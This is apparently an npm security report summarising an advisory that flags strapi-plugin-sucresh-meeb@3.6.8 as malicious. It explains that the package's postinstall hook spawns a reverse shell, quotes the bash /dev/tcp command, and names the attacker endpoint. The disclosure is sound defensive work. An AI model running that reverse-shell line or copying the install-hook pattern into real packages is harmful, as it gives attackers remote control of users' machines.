Loading npm security reports…
OpenSSF/OSV advisory MAL-2026-16189 confirms this npm version as malicious. strapi-plugin-sucresh-meeb@3.6.8 declares a postinstall lifecycle hook (`node postinstall.js`) that runs automatically on `npm install`. The postinstall script uses child_process.exec to spawn a bash subprocess with an interactive reverse shell (`bash -i > /dev/tcp/<host>/<port> 0>&1`) connecting to the hardcoded remote endpoint 14.225.210.85:443...
This report applies to strapi-plugin-sucresh-meeb@3.6.8.
See version security history for other recorded verdicts.
Evidence last updated: .
Source advisory published: .
This report uses published external intelligence. The advisory does not provide a separate source-code analysis for each listed version.